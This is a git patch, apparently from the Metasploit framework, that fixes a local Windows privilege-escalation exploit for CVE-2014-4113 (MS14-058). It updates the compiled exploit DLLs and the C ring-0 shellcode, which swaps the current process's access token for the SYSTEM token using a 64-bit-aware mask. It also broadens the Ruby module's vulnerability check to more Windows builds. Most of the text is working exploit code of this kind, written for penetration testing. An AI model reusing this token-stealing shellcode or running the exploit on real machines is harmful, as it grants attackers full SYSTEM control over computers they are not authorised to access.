From 6574db5dbbb9930dc8833fddce74cdfdd903a750 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 30 Oct 2014 17:01:59 -0500 Subject: [PATCH] Fix the 64 bits code --- .../CVE-2014-4113/cve-2014-4113.x64.dll | Bin 85504 -> 85504 bytes .../CVE-2014-4113/cve-2014-4113.x86.dll | Bin 73216 -> 73216 bytes .../cve-2014-4113/cve-2014-4113.c | 15 +++++++++------ .../local/ms14_058_track_popup_menu.rb | 6 +----- 4 files changed, 10 insertions(+), 11 deletions(-) diff --git a/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll b/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll index 2b83c1358c95212f81397eae8c5ca0bcc9a0a4ad..24ccff32fc0d371ec58aa796338d5bab3acef057 100755 GIT binary patch delta 71 zcmZpe!`d*1b;1v(Y6}!(=b6Ch_hY|3z8s85umfeN+@2cQP27|^wf!*{W1$dG*Y+@3##IIY@Vy$j delta 71 zcmZpe!`d*1b;1v(xrGyd`7u8|!noO+@gE1{kI7zKP2$Nn{)@8MGctH|`=}^5?qpzM bVCcT=lid86Yx`p^#zG;WuI*v6jH?U){^}Zw diff --git a/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll b/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll index e2d5aa76bc7670748d52be0a442f520502cd91b9..fd71f95119f5b9b4d9bb9c9065c1cce933e2d295 100755 GIT binary patch delta 30 lcmZqJ!_u&aWx@xhrp*&S`7xdF+w8=6=`)bGS?ud84FKRo4&wj- delta 30 lcmZqJ!_u&aWx@xhlER6f{Fqjs+U&%5=`)bGS?ud84FKI84x#`6 diff --git a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c index 1c59213cfe..d81d9d224c 100755 --- a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c +++ b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c @@ -38,7 +38,7 @@ typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)( OUT PVOID Process ); -typedef NTSTATUS(NTAPI *lPsReferencePrimaryToken)( +typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)( _Inout_ PVOID Process ); @@ -137,7 +137,7 @@ DWORD_PTR __stdcall get_threadinfo_ptr(void) // Search the specified data structure for a member with CurrentValue. -BOOL FindAndReplaceMember(PDWORD Structure, +BOOL find_and_replace_member(PDWORD Structure, DWORD CurrentValue, DWORD NewValue, DWORD MaxSize) @@ -146,8 +146,11 @@ BOOL FindAndReplaceMember(PDWORD Structure, // Microsoft QWORD aligns object pointers, then uses the lower three // bits for quick reference counting. +#ifdef _M_X64 + Mask = ~0xf; +#else Mask = ~7; - +#endif // Mask out the reference count. CurrentValue &= Mask; @@ -174,11 +177,11 @@ int _stdcall shellcode_ring0(int one, int two, int three, int four) pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &pMyProcessInfo); pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo); - TargetToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pMyProcessInfo); - SystemToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pSystemInfo); + TargetToken = pPsReferencePrimaryToken(pMyProcessInfo); + SystemToken = pPsReferencePrimaryToken(pSystemInfo); // Find the token in the target process, and replace with the system token. - FindAndReplaceMember((PDWORD)pMyProcessInfo, + find_and_replace_member((PDWORD)pMyProcessInfo, (DWORD)TargetToken, (DWORD)SystemToken, 0x200); diff --git a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb index 474404f68f..e6a388f10c 100644 --- a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb +++ b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb @@ -94,11 +94,7 @@ class Metasploit3 < Msf::Exploit::Local return Exploit::CheckCode::Safe if build == 9200 return Exploit::CheckCode::Safe if build == 9600 - if arch == ARCH_X86 - return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build) - else - return Exploit::CheckCode::Detected if build == 7601 - end + return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build) return Exploit::CheckCode::Unknown end